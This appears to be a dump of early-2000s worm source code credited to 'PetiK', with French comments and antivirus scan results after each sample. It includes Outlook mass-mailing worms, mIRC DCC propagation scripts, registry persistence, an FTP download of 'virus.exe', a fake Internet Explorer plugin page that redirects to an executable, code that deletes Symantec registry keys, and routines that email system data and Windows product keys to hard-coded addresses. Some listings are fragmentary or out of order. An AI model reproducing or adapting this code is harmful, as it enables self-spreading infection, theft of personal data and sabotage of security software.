push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset VBSFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT
push 00000080h ;
push 00000002h ; qui va éxécuter ENVOIE.VBS
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset BATFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
jmp EXECBAT ;

push 0 ;
push 0F003Fh ;
push 0 ;
push 0 ;
push 0 ;
push eax ; Software\[Atchoum]
push [regResu] ; met la valeur dans regResu
call RegCloseKey ;
ret ;
INIFILE:push 00000000h ; On va créer dans C:\Win32

push 00000001h ;
push 00000002h ; le fichier script.ini
push 00000000h ;
push 00000001h ; en lecture seul.
push 40000000h ;
push offset fileini ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push initaille ;
push offset inid ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 00h ; On va copier ce fichier dans les

push offset script1 ; répertoire suivant :
call CopyFileA ; C:\mirc C:\mirc32
test eax,eax ; C:\program files\mirc et dans
jnz COPYWIN ; C:\program files\mirc32
push 00h ;
push offset script2 ; Si il arrive … se copier dans un
push offset fileini ; de ces fichier, il va créer une
call CopyFileA ; copie du programme dans C:\Win32
test eax,eax ; le nom MadCow.exe
jnz COPYWIN ;
push 00h ;
call CopyFileA ;
test eax,eax ;
jnz COPYWIN ;
push 00h ;
call CopyFileA ;
test eax,eax ;
jz ICOFILE ;
COPYWIN:push 0 ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;
ICOFILE:push 00000000h ; On va créer … la base du disque

push 00000080h ;
push 00000002h ; dur le fichier Salut.ico
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset fichier ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push icotaille ;
push offset icod ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 260 ; On déplace le fichier Salut.ico
push offset szCico ;
call GetSystemDirectoryA ; dans le dossier SYSTEM sous
push offset Copico ;
push offset szCico ; MSLS.ICO
call lstrcat ;
push offset szCico ;
push offset fichier ;
call MoveFileA ; => c'est fait
REG2: push offset l ;

push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ; Run
push 80000000h ; HKEY_CLASSES_ROOT
push 05h ;
push offset szCico ; %system%\MSLS.ico
push 01h ;
push 0 ;
push 00h ; VALEUR PAR DEFAUT
push p ;
call RegSetValueExA ; CREE UN REGISTRE
push 0 ;
call RegCloseKey ; FERME LA BASE DE REGISTRE
jmp FIN ; PUIS TERMINE LE PROGRAMME
EXECBAT:push 01h ; On éxécute le fichier ENVOIE.BAT
call WinExec ;
FIN: push 00h ; FIN DU PROGRAMME
call ExitProcess ;
end DEBUT
File MadCow.exe received on 05.16.2009 17:51:57 (CET)
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.8192
AntiVir 7.9.0.168 2009.05.15 Worm/Petik
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.E
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IM.5B177226
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.A
ClamAV 0.94.1 2009.05.16 Worm.Madcow
Comodo 1157 2009.05.08 Worm.Win32.Petik.Z
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.B/C
F-Prot 4.4.4.56 2009.05.16 W32/Petik.E
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.E@mm
GData 19 2009.05.16 Generic.Malware.IM.5B177226
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik.Z
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.A
PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.x
Sophos 4.41.0 2009.05.16 W32/Petik-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.E
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter
MD5...: 15b037d0d23a915fb0a78961cdc7299a
SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6
;Par M.Xxxxxxx XXXXXXX (c)2000
;DWARF4 MODIFIE LA DATE AU 26 DECEMBRE 1999
;C:\DWARF.VBS QUI AJOUTE UN CLE DANS LA BASE DE REGISTRE
;C:\WINDOWS\DWARF.BAT QUI AFFICHE UN MESSAGE A CHAQUE DEMARRAGE
.model small
.code
org 100h
DATE: mov ah,2Bh

mov dh,12
mov dl,26
mov cx,1999
int 21h ;26 DECEMBRE 1999
HEURE: mov ah,2Dh
xor cx,cx
xor dx,dx
int 21h ;MINUIT
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;création du 1er fichier
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;écriture
mov ah,3Eh
int 21h ;fermeture
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;création du 2nd fichier
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;‚criture
mov ah,3Eh
int 21h ;fermeture
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h
NOM1 db 'c:\dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.bat',0
db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1 equ $-prog1
prog2 db '@echo off',0Dh,0Ah
db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
db 'if errorlevel 1 goto Die',0Dh,0Ah
db ':Die',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
db 'echo * * * * * * ** **',0Dh,0Ah
db 'echo * * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
progl2 equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end DATE
' Name : VBS.Judge.A
' Author : PetiK
' Language : VBS
' Date : 08/12/2000
' Copy itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs

' Add to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
' WinGDI = %windir%\WinGDI.EXE.vbs
' Function EMAIL : Scan Address Contact and send a mail with copy.
'VBS.Judge.A par Petik (c)2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinGDI.EXE.vbs")
c.Copy("C:\Judge.TXT.vbs")
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
EMAIL()
'FTP()
'AUTOEXEC()
TXT()
End Sub
Sub EMAIL()
If Not fso.FileExists("C:\Judge.txt") Then
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "BatMan, SpiderMan et les autres"
msg.Body = "La vraie histoire de ces justiciers"
msg.Attachments.Add "C:\Judge.TXT.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
End If
End Sub
Sub FTP()
If Not fso.FileExists("C:\Judge.txt") Then
Set bat = fso.CreateTextFile(win&"\FTP.bat")
bat.WriteLine "@echo off"
bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
bat.close
Set drv = fso.CreateTextFile("C:\FTP.drv")
drv.WriteLine "open"
drv.WriteLine "members.aol.com"
drv.WriteLine "pentasm99"
drv.WriteLine "binary"
drv.WriteLine "lcd C:\"
drv.WriteLine "get virus.exe"
drv.WriteLine "bye"
drv.WriteLine "exit"
drv.close
ws.Run (win&"\FTP.bat")
End If
End Sub
Sub AUTOEXEC()
If Day(Now) = 1 then
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set autobat= FileObj.CreateTextFile (file, True, False)
autobat.write(tline)
autobat.WriteBlankLines(1)
autobat.WriteLine "@echo off"
autobat.WriteLine "cls"
autobat.WriteLine "echo."
autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
autobat.WriteLine "pause"
End If
End Sub
Sub TXT()
Set ptk = fso.CreateTextFile("C:\Judge.txt")
ptk.WriteLine "Si vous lisez ce texte,"
ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
ptk.Close
Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
mp3.Write vbs
mp3.close
End Sub
File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 VBS/VBSWG
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A
GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67
K7AntiVirus 7.10.737 2009.05.16 -
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I
NOD32 4080 2009.05.15 VBS/Petik.A
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm
Panda 10.0.0.14 2009.05.16 VBS/I-Worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.I
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Judge
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I
MD5...: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257
' Name : VBS.Noel
' Author : PetiK
' Language : VBS
' Date : 12/12/2000
Dim fso,ws,file
DEBUT()
Sub DEBUT()
c.Copy("C:\NOEL.GIF.vbs")
EMAIL()
End Sub
Sub EMAIL()
msg.Subject = "JOUYEUX NOEL"
msg.Body = "Voici une photodu PERE NOEL"
msg.Attachments.Add ("C:\NOEL.GIF.vbs")
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pif878@aol.com"
nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
CN = CreateObject("WScript.NetWork").ComputerName
msg2.Subject = "Message de """ & nom & """ alias " & CN & ""
page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey")
msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """"
msg2.Send
End Sub
File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET)

AhnLab-V3 5.0.0.2 2009.05.11 VBS/Petik
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.J1
Authentium 5.1.2.4 2009.05.10 VBS/Petik.M@mm
AVG 8.5.0.327 2009.05.10 VBS/VBSWG
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.A79766E0
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.M
ClamAV 0.94.1 2009.05.11 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.11 modification of VBS.Generic.458
eSafe 7.0.17.0 2009.05.10 -
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.M@mm
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.J@mm
GData 19 2009.05.11 Generic.ScriptWorm.A79766E0
K7AntiVirus 7.10.729 2009.05.08 -
McAfee 5611 2009.05.10 W32/PetTick.vbs
McAfee+Artemis 5611 2009.05.10 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.J1
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.J
NOD32 4063 2009.05.08 probably unknown SCRIPT
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.B@mm
Panda 10.0.0.14 2009.05.10 -
PCTools 4.4.2.0 2009.05.07 VBS.Petik.J
Prevx 3.0 2009.05.11 -
Sophos 4.41.0 2009.05.11 VBS/Petik-J
Sunbelt 3.2.1858.2 2009.05.09 -
Symantec 1.4.4.12 2009.05.11 VBS.LoveLetter.Var
TheHacker 6.3.4.1.324 2009.05.09 -
TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.009
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.J
MD5...: fcc75e971157a8d9103b5bc583847f87
SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5
comment $
W32.TWIN par PetiK le 20/12/2000
POUR COMPILER:
tasm32 /M /ML ?????.asm

tlink32 -Tpe -x -aa ?????.obj,,,import32
.386
jumps
locals
;KERNEL32.dll
extrn lstrcat:PROC
;USER32.dll
;ADVAPI32.dll
.data
fh dd ?
octets dd ?
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
szBAT db 260 dup (0)
szHTM db 260 dup (0)
szVBS db 260 dup (0)
Copie db "\NAV5.exe",00h
BATFILE db "\IE55.bat",00h
HTMFILE db "\IE55.htm",00h
VBSFILE db "\IE55.vbs",00h
run db "run",00h
CLE db "Software\[PetiK]",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2 db "Start Page",00h
vbsd:
db 'rem IE55.vbs pour W32.TWiN',0dh,0ah
db '',0dh,0ah
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah
db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah
db 'ws.Run (sys&"\IE55.htm")',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\'
db 'Download Directory","C:\"',0dh,0ah
db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah
db 'End If',0dh,0ah
db 'MIRC()',0dh,0ah
db '',0dh,0ah
db 'Sub MIRC()',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah
db ' Set c = (sys&"\NAV5.exe")',0dh,0ah
db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah
db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah
db ' srpt.WriteLine "[script]"',0dh,0ah
db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah
db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah
db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah
db ' srpt.WriteLine "n3=}"',0dh,0ah
db ' srpt.Close',0dh,0ah
db 'End If',0dh,0ah
vbstaille equ $-vbsd
htmd:
db '<HTML><HEAD>',0dh,0ah
db '<TITLE>Plugin pour Internet Explorer / '
db 'Plugin for Internet Explorer</TITLE>',0dh,0ah
db '<SCRIPT language="JavaScript">',0dh,0ah
db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah
db 'temps = 10;',0dh,0ah
db '',0dh,0ah
db 'function affiche()',0dh,0ah
db '{ if (temps-- == 0) ',0dh,0ah
db ' { clearInterval(attente);',0dh,0ah
db ' location.href=site;',0dh,0ah
db ' return;',0dh,0ah
db ' }',0dh,0ah
db ' document.forms[0].elements[0].value = temps;',0dh,0ah
db '}',0dh,0ah
db '</SCRIPT>',0dh,0ah
db ' ',0dh,0ah
db '</HEAD>',0dh,0ah
db '<BODY bgColor=black text=red onload='''attente = setInterval'
db '("affiche()", 1000);'''>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah
db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=left>',0dh,0ah
db '<HR SIZE=4>',0dh,0ah
db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah
db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah
db '<HR SIZE=1>',0dh,0ah
db '</DIV>v
db '<DIV align=center>',0dh,0ah
db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>',0dh,0ah
db '</FORM></DIV></BODY></HTML>',0dh,0ah
htmtaille equ $-htmd
batd:
db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h
battaille equ $-batd
.code
DEBUT: mov eax, offset CLE ; Vérifie si il existe une clé
call REG ; [PetiK] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas, il se copie
jne FIN ; puis modifie le fichier WIN.INI
WCOPIE: push 0 ;
push 260 ; Le programme se copie dans le
push eax ;
call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur
push 260 ;
push offset szCopie ; et se nommera NAV5.exe
push offset Copie ;
call lstrcat ;
push 0 ;
call CopyFileA ;
WIN_INI:push 260 ; On met dans le fichier WIN.INI

push offset szWin ; une routine pour que le programme
call GetWindowsDirectoryA ; s'active à chaque démarrage.
push offset Winini ; Cela évite d'utiliser la BASE DE
push offset szWin ; REGISTRE trop voyante.
call lstrcat ;
push offset szWin ; Dans WIN.INI du dossier WINDOWS
push offset szCopie ; "nom du programme"
push offset run ; run=
push offset windows ; [windows]
BAT: push 260 ;

push offset szBAT ;
call GetSystemDirectoryA ;
push offset szBAT ;
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szBAT ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
VBS: push 260 ; On va créer un fichier

push offset szVBS ;
call GetSystemDirectoryA ; dans le réperoire SYSTEM
push offset VBSFILE ;
push offset szVBS ; qui s'appelle IE55.VBS
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szVBS ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
HTM: push 260 ; On va créer un fichier

push offset szHTM ;
call GetSystemDirectoryA ; dans le réperoire SYSTEM
push offset HTMFILE ;
push offset szHTM ; qui s'appelle IE55.HTM
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szHTM ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push htmtaille ;
push offset htmd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
BDR: push offset l ;

push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ;
push 80000001h ; HKEY_CURRENT_USER
push 05h ;
push offset szVBS ; On va créer une clé dans la
push 01h ;
push 0 ;
push offset NOM2 ; Base de Registre pour qu'il
push p ;
call RegSetValueExA ;
push 0 ; active le fichier VBS quand on
call RegCloseKey ; va sur internet
jmp FIN ;

push 0 ; default security descriptor
push 0F003FH ; KEY_ALL_ACCESS
push 0 ;
push 0 ;
push 0 ;
push eax ; adresse de la sous-CLE
push [regResu] ;
call RegCloseKey ;
ret ;
FIN: push 0 ;
call ExitProcess ; Fin du Programme
end DEBUT
IE55.HTM
<HTML><HEAD>
<TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE>
<SCRIPT language="JavaScript">
site="http://www.multimania.com/kadosh/PlugIE55.exe ";
temps = 10;
function affiche()
{ if (temps-- == 0)
{ clearInterval(attente);
location.href=site;
return;
}
document.forms[0].elements[0].value = temps;
}
</SCRIPT>
</HEAD>
<BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'>
<DIV align=center>
<H1>Plugin pour Microsoft Internet Explorer</H1>
<H1>Plugin for Microsoft Internet Explorer</H1>
</DIV>
<DIV align=left>
<HR SIZE=4>
<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>
<H3>Please download the plugin in C:\ path</H3>
<HR SIZE=1>
</DIV>
<DIV align=center>
<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>
</FORM></DIV></BODY></HTML>
' Name : VBS/mIRC/NetWork.A
' Author : PetiK
' Language : VBS
' Date : 29/12/2000
'VBS/mIRC/NetWork.A par PetiK 29/12/2000
Dim fso,ws,file
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll
DEBUT()
Sub DEBUT()
RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
NetWork = (win&"\Network.vbs")
c.Copy (NetWork)
ws.RegWrite RS,NetWork
'NORTON()
MIRC()
ESPION()
EMAIL()
End Sub
Sub NORTON()
ws.RegDelete ("HKLM\Software\Symantec\")
ws.RegDelete ("HKCU\Software\Symantec\")
End Sub
Sub ESPION()
Set A = CreateObject("Outlook.Application")
Set B = A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D = 1 To C.AddressEntries.Count
Set E = C.Addressentries(D)
Next
End If
Next
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName")
REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper")
DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut")
PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
Set aze = fso.CreateTextFile ("C:\ESPION.txt",true)
aze.WriteLine "Information sur l'ordinateur"
aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName
aze.WriteLine "NOM D'UTILISATEUR : " & NOM
aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT
aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM
aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2
aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3
aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB
aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES"
aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name
aze.WriteLine "ADDRESSE : " & E.Address
aze.WriteBlankLines(2)
aze.WriteLine "Information sur internet"
aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM
aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR
End Sub
Sub MIRC()
On Error Resume Next
NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
script = ("C:\script.ini")
Set srpt = fso.CreateTextFile(script, true)
srpt.WriteLine "[script]; par PetiK "
srpt.WriteLine "n0=on 1:JOIN:#:{"
srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"
srpt.WriteLine "n2= /dcc send $nick " & NET2
srpt.WriteLine "n3=}"
srpt.Close
fso.CopyFile script, "C:\mirc\script.ini"
fso.CopyFile script, "C:\mirc32\script.ini"
fso.CopyFile script, "C:\program files\mirc\script.ini"
fso.CopyFile script, "C:\program files\mirc32\script.ini"
fso.DeleteFile ("C:\script.ini")
End Sub
Sub EMAIL()
msg.Subject = "NetWork Game for WINDOWS"
msg.Body = "The new game for your computer arrives"
msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs")
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
msg2.Subject = "Message écrit le " & date
msg2.Body = "Il était " & time
msg2.Attachments.Add ("C:\ESPION.txt")
msg2.Send
fso.DeleteFile ("C:\ESPION.txt")
End Sub
File Network.vbs received on 05.16.2009 17:59:59 (CET)
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
